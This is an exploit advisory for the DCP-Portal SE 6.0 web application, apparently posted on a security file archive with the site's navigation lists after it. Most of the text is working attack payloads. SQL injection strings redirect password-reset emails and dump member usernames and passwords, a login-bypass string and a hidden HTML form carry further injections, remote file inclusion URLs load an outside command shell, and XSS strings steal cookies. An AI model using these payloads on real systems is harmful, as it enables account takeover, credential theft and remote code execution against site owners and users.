DCP-PortalSE6.0.txt

DCP-PortalSE6.0.txt: Posted Sep 14, 2006; Authored by HACKERS PAL | Site soqor.net; If magic_quotes_gpc = off then DCP-Portal SE 6.0 suffers from multiple SQL injection vulnerabilities.; tags | exploit, vulnerability, sql injection; SHA-256 | 0765acf983b5e7f132283ff3265e5f35531a5390cca29b9e8d6ad691ebc8dbbe; Download | Favorite | View

DCP-PortalSE6.0.txt

Hello,,


DCP-Portal SE  6.0  multiple injections


Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

sql injections
if magic_qoutes_gpc = off
/*************************************/

lostpassword.php

you can recive the reset password email on your email for any user you want :)
change youremail@yourserver.com to your real email
example :
-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*

and you will recive email reset password for all the members in this website

and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid

-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*

---------------------------
login
try the user name as
' or uid=1/*

or change the uid value for any username you want log with
---------------------------
file calendar.php
Sql injection by post method ,, try this form :)

<form name="hack" action="calendar.php" method=post>
<input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1">
<input type=submit>
</form>

---------------------------
file search.php

try one of these ,, bcause the number of columns changes from section to another :)
if you searched for (content,news,link,forum)
use
xx%') union select uid,username,password from dcp5_members/*

if you searched for (doc,anns)
use
xx%') union select uid,username,password,password from dcp5_members/*
/*************************************/

Remote File including
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*************************************/

Fill path
library/editor/editor.php
library/lib.php

/*************************************/

Xss
admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>

admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>

/*************************************/
WwW.SoQoR.NeT

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

DCP-PortalSE6.0.txt

DCP-PortalSE6.0.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DCP-PortalSE6.0.txt

Share This

DCP-PortalSE6.0.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems